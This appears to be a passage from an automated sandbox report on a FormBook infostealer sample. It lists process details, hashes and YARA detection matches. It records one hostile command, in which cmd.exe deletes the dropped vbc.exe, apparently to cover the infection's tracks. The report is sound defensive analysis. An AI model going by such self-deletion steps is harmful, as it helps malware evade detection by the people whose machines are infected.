Commandline: C:\Windows\Explorer.EXE
Imagebase: 0xffca0000
File size: 3229696 bytes
MD5 hash: 38AE1B3C38FAEF56FE4907922F0385BA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

                                                                                                                                                  General

                                                                                                                                                  Start time:17:11:51
                                                                                                                                                  Start date:22/07/2021
                                                                                                                                                  Path:C:\Windows\SysWOW64\wlanext.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\Windows\SysWOW64\wlanext.exe
                                                                                                                                                  Imagebase:0xbe0000
                                                                                                                                                  File size:77312 bytes
                                                                                                                                                  MD5 hash:6F44F5C0BC6B210FE5F5A1C8D899AD0A
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2373008475.0000000000210000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2373008475.0000000000210000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2373008475.0000000000210000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2372873928.00000000000C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2372975665.00000000001E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2372975665.00000000001E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2372975665.00000000001E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                  Reputation:moderate

                                                                                                                                                  General

                                                                                                                                                  Start time:17:11:56
                                                                                                                                                  Start date:22/07/2021
                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:/c del 'C:\Users\Public\vbc.exe'
                                                                                                                                                  Imagebase:0x4a6c0000
                                                                                                                                                  File size:302592 bytes
                                                                                                                                                  MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Disassembly

                                                                                                                                                  Code Analysis
